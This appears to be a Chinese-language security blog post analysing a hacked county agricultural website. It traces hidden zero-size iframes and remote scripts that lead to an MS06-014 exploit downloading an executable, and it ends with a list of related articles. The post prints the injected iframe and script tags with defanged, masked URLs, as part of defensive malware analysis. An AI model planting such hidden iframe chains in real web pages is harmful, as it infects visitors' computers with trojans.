某县农业信息网挂马RootKit.Win32.Mnless,Trojan.Win32.Edog等

简介: 某县农业信息网挂马RootKit.Win32.Mnless,Trojan.Win32.Edog等

打开该网站后IE失去响应……

在该网站首页底部发现代码:

/---
<iframe src="hxxp://8**8.8*812**15.com/88.htm" width=0 height=0></iframe>
---/

1 hxxp://8**8.8*812**15.com/88.htm

包含代码:

/---
<iframe src="hxxp://8**8.8*812**15.com/in.htm" width=0 height=0></iframe>
<iframe src="hxxp://ga**.mm*52**08.com/w.htm" width=0 height=0></iframe>
<iframe src="hxxp://d**v.5**51*89.net/" width=0 height=0></iframe>
<iframe src="hxxp://a*1**.sb**b2*2.com/a.htm" width=0 height=0></iframe>
<iframe src="hxxp://s*f*.07**08*08.net/sf.htm" width=0 height=0></iframe>
---/

1.1 hxxp://8**8.8*812**15.com/in.htm

包含代码:

/---
<iframe src="hxxp://y**un.y**un8**78.com/web/6619038.htm" width=100 height=0></iframe>
---/

1.1.1 hxxp://y**un.y**un8**78.com/web/6619038.htm

包含代码:

/---
<iframe src=htm.html width=100 height=0></iframe>
---/

1.1.1.1 hxxp://y**un.y**un8**78.com/web/htm.html输出代码:

/---
<script src=hxxp://y**un.y**un8**78.com/web/1.js></script>
<script src=hxxp://y**un.y**un8**78.com/web/bf.js></script>
<script src=hxxp://y**un.y**un8**78.com/web/pps.js></script>
<iframe width='10'height='10'src='hxxp://y**un.y**un8**78.com/web/3.htm'></iframe>
<script src=hxxp://y**un.y**un8**78.com/web/pps.js></script>
<iframe width='100' height='0' src='hxxp://y**un.y**un8**78.com/web/2.htm'></iframe>
<iframe width=100 height=0 src=hxxp://y**un.y**un8**78.com/web/0.htm></iframe>
---/

1.1.1.1.1 hxxp://y**un.y**un8**78.com/web/1.js

利用 MS06-014: msadco.dll 严重漏洞 下载 hxxp://y**un.y**un8**78.com/14.exe


相关文章
|
23天前
|
存储 安全 UED
Cyber Triage 3.13 for Windows - 数字取证和事件响应
Cyber Triage 3.13 for Windows - 数字取证和事件响应
106 71
Cyber Triage 3.13 for Windows - 数字取证和事件响应
|
6月前
|
安全
某电力信息网挂马Worm.Win32.AutoRun,Trojan-Downloader.Win32.Losabel
某电力信息网挂马Worm.Win32.AutoRun,Trojan-Downloader.Win32.Losabel
|
6月前
|
Web App开发 安全
某县农业信息网挂马 Worm.Win32.AutoRun.umf
某县农业信息网挂马 Worm.Win32.AutoRun.umf
|
6月前
|
安全 JavaScript 前端开发
小心冒充瑞星专家的病毒ravexp.exe
小心冒充瑞星专家的病毒ravexp.exe
|
安全
Windows10被曝漏洞,受害者电脑沦为“肉鸡”
一旦被攻击者利用,电脑里的任何应用都可能拥有系统权限,攻击者可以执行危害级别更高的恶意行为,受害者电脑沦为“肉鸡”。
453 0
|
监控 安全 机器人
10大最危险IT技术 病毒和Windows纳米上榜
据国外媒体报道,英国知名IT网站Vnunet日前评出了10大最危险的IT技术,计算机病毒和Windows操作系统等纷纷上榜。 几乎任何技术都具有两面性,在有利于社会发展的同时,也可能对社会造成莫大伤害。
1174 0
|
安全 Windows
卡巴斯基:高达98%的WannaCry 受害者运行的是 Windows 7系统
本文讲的是卡巴斯基:高达98%的WannaCry 受害者运行的是 Windows 7系统,几天前,WannaCry勒索软件在全球迅速蔓延,150多个国家的30多万台计算机设备齐齐中招。传播程度之广、危害之大,近数十年罕见,因此也再次让全球所有计算机用户意识到了更新补丁、及时修复漏洞的重要性。
1926 0
|
安全 数据安全/隐私保护
恶意软件“八月”利用powershell进行无文件感染
本文讲的是恶意软件“八月”利用powershell进行无文件感染,Proofpoint安全研究专家提醒,一种叫做“八月”(August)的新型窃取信息恶意软件正利用Windows powershell脚本进行无文件感染并通过Word文档传播。
1406 0